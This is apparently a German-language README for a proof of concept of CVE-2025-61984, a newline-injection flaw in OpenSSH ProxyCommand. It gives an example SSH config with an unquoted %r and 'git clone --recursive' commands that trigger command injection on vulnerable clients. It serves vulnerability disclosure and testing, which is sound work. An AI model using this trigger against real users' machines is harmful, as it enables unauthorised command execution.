
Proof-of-Concept, das eine Newline-Injection-Schwachstelle in OpenSSH ProxyCommand (CVE-2025-61984) demonstriert und eine Befehlsinjektion über manipulierte SSH-Konfiguration ermöglicht.
Dies ist ein Proof of Concept, das einen Zeilenumbruch nutzt, um OpenSSHs <10.1 ProxyCommand zu verwirren. Vollständiger Artikel.
Richten Sie eine .ssh/config mit folgendem Inhalt ein:
Host *.example.com
ProxyCommand some-command %r@%h:%p
(Die Befehlszeile spielt keine Rolle, sie benötigt nur ein nicht in Anführungszeichen gesetztes %r in den Argumenten.)
Führen Sie dann aus (für bash):
$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc
Oder wenn Sie fish als $SHELL verwenden:
git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc
Wenn Sie die Shell nicht verwenden, aber dies testen möchten, können Sie Folgendes tun:
$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc